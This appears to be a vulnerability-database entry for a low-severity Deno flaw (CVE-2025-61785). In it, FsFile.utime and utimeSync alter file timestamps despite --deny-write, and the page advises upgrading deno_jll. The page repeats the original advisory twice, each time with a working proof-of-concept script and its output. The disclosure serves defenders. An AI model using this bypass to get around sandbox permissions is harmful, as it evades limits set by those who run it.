Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
3.3
Deno's --deny-write check does not prevent permission bypass
JLSEC-2026-111
Summary
### Summary
`Deno.FsFile.prototype.utime` and `Deno.FsFile.prototype.utimeSync` are not limited by the permission model check `--deny-write=./`.
It's possible to change to change the access (`atime`) and modification (`mtime`) times on the file stream resource even when the file is opened with `re...
What to do
- Update deno_jll to version 2.6.3+0.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| Julia | – | deno_jll |
< 2.6.3+0 Fix: upgrade to 2.6.3+0
|
Original title
Deno's --deny-write check does not prevent permission bypass
Original description
### Summary
`Deno.FsFile.prototype.utime` and `Deno.FsFile.prototype.utimeSync` are not limited by the permission model check `--deny-write=./`.
It's possible to change to change the access (`atime`) and modification (`mtime`) times on the file stream resource even when the file is opened with `read` only permission (and `write`: `false`) and file write operations are not allowed (the script is executed with `--deny-write=./`).
Similar APIs like `Deno.utime` and `Deno.utimeSync` require `allow-write` permission, however, when a file is opened, even with read only flags and deny-write permission, it's still possible to change the access (`atime`) and modification (`mtime`) times, and thus bypass the permission model.
### PoC
Setup:
```
deno --version
deno 2.4.2 (stable, release, x86_64-unknown-linux-gnu)
v8 13.7.152.14-rusty
typescript 5.8.3
touch test.txt
```
```js
// touch test.txt
// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utime
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1
async function poc1(){
using file = await Deno.open("./test.txt", { read: true, write: false});
const fileInfoBefore = await file.stat();
await file.utime(new Date("2000-01-01"), new Date("2000-01-01"));
const fileInfoAfter = await file.stat();
console.log(`BEFORE (utime)`)
console.log(new Date(fileInfoBefore.mtime).getFullYear())
console.log(new Date(fileInfoBefore.atime).getFullYear())
console.log(`AFTER (utime)`)
console.log(new Date(fileInfoAfter.mtime).getFullYear())
console.log(new Date(fileInfoAfter.atime).getFullYear())
}
// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utimeSync
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2
function poc2(){
using file = Deno.openSync("./test.txt", { read: true, write: false});
const fileInfoBefore = file.statSync();
file.utimeSync(new Date("2001-01-01"), new Date("2001-01-01"));
const fileInfoAfter = file.statSync();
console.log(`BEFORE (utimeSync)`)
console.log(new Date(fileInfoBefore.mtime).getFullYear())
console.log(new Date(fileInfoBefore.atime).getFullYear())
console.log(`AFTER (utimeSync)`)
console.log(new Date(fileInfoAfter.mtime).getFullYear())
console.log(new Date(fileInfoAfter.atime).getFullYear())
}
// https://docs.deno.com/api/deno/~/Deno.utime
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3
async function poc3(){
// not executed
await Deno.utime("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
}
// https://docs.deno.com/api/deno/~/Deno.utimeSync
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4
function poc4(){
// not executed
Deno.utimeSync("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
}
async function main(){
const poc = Deno.args[0] || 1;
const status = await Deno.permissions.query({ name: "write", path: "./" });
console.log(status);
switch (poc) {
case "1":
poc1()
break;
case "2":
poc2()
break;
case "3":
poc3()
break;
case "4":
poc4()
break;
default:
poc1()
}
}
main()
```
Output:
- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1`
```
PermissionStatus { state: "denied", onchange: null }
BEFORE (utime)
2025
2025
AFTER (utime)
2000
2000
```
- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2`
```
PermissionStatus { state: "denied", onchange: null }
BEFORE (utimeSync)
2000
2000
AFTER (utimeSync)
2001
2001
```
- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3`
```
PermissionStatus { state: "denied", onchange: null }
error: Uncaught (in promise) NotCapable: Requires write access to "./test.txt", run again with the --allow-write flag
await Deno.utime("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
^
...
```
- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4`
```
PermissionStatus { state: "denied", onchange: null }
error: Uncaught (in promise) NotCapable: Requires write access to "./test.txt", run again with the --allow-write flag
Deno.utimeSync("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
^
...
```
### Impact
Permission model bypass
`Deno.FsFile.prototype.utime` and `Deno.FsFile.prototype.utimeSync` are not limited by the permission model check `--deny-write=./`.
It's possible to change to change the access (`atime`) and modification (`mtime`) times on the file stream resource even when the file is opened with `read` only permission (and `write`: `false`) and file write operations are not allowed (the script is executed with `--deny-write=./`).
Similar APIs like `Deno.utime` and `Deno.utimeSync` require `allow-write` permission, however, when a file is opened, even with read only flags and deny-write permission, it's still possible to change the access (`atime`) and modification (`mtime`) times, and thus bypass the permission model.
### PoC
Setup:
```
deno --version
deno 2.4.2 (stable, release, x86_64-unknown-linux-gnu)
v8 13.7.152.14-rusty
typescript 5.8.3
touch test.txt
```
```js
// touch test.txt
// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utime
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1
async function poc1(){
using file = await Deno.open("./test.txt", { read: true, write: false});
const fileInfoBefore = await file.stat();
await file.utime(new Date("2000-01-01"), new Date("2000-01-01"));
const fileInfoAfter = await file.stat();
console.log(`BEFORE (utime)`)
console.log(new Date(fileInfoBefore.mtime).getFullYear())
console.log(new Date(fileInfoBefore.atime).getFullYear())
console.log(`AFTER (utime)`)
console.log(new Date(fileInfoAfter.mtime).getFullYear())
console.log(new Date(fileInfoAfter.atime).getFullYear())
}
// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utimeSync
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2
function poc2(){
using file = Deno.openSync("./test.txt", { read: true, write: false});
const fileInfoBefore = file.statSync();
file.utimeSync(new Date("2001-01-01"), new Date("2001-01-01"));
const fileInfoAfter = file.statSync();
console.log(`BEFORE (utimeSync)`)
console.log(new Date(fileInfoBefore.mtime).getFullYear())
console.log(new Date(fileInfoBefore.atime).getFullYear())
console.log(`AFTER (utimeSync)`)
console.log(new Date(fileInfoAfter.mtime).getFullYear())
console.log(new Date(fileInfoAfter.atime).getFullYear())
}
// https://docs.deno.com/api/deno/~/Deno.utime
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3
async function poc3(){
// not executed
await Deno.utime("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
}
// https://docs.deno.com/api/deno/~/Deno.utimeSync
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4
function poc4(){
// not executed
Deno.utimeSync("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
}
async function main(){
const poc = Deno.args[0] || 1;
const status = await Deno.permissions.query({ name: "write", path: "./" });
console.log(status);
switch (poc) {
case "1":
poc1()
break;
case "2":
poc2()
break;
case "3":
poc3()
break;
case "4":
poc4()
break;
default:
poc1()
}
}
main()
```
Output:
- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1`
```
PermissionStatus { state: "denied", onchange: null }
BEFORE (utime)
2025
2025
AFTER (utime)
2000
2000
```
- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2`
```
PermissionStatus { state: "denied", onchange: null }
BEFORE (utimeSync)
2000
2000
AFTER (utimeSync)
2001
2001
```
- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3`
```
PermissionStatus { state: "denied", onchange: null }
error: Uncaught (in promise) NotCapable: Requires write access to "./test.txt", run again with the --allow-write flag
await Deno.utime("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
^
...
```
- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4`
```
PermissionStatus { state: "denied", onchange: null }
error: Uncaught (in promise) NotCapable: Requires write access to "./test.txt", run again with the --allow-write flag
Deno.utimeSync("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
^
...
```
### Impact
Permission model bypass
osv CVSS3.1
3.3
- https://nvd.nist.gov/vuln/detail/CVE-2025-61785 URL
- https://github.com/denoland/deno/commit/992e998dfe436cdc9325232759af8be92f11739b URL
- https://github.com/denoland/deno/pull/30872 URL
- https://github.com/denoland/deno/releases/tag/v2.2.15 URL
- https://github.com/denoland/deno/releases/tag/v2.5.3 URL
- https://github.com/denoland/deno/security/advisories/GHSA-vg2r-rmgp-cgqj URL
- https://github.com/advisories/GHSA-vg2r-rmgp-cgqj URL
Published: 14 Apr 2026 · Updated: 14 Apr 2026 · First seen: 14 Apr 2026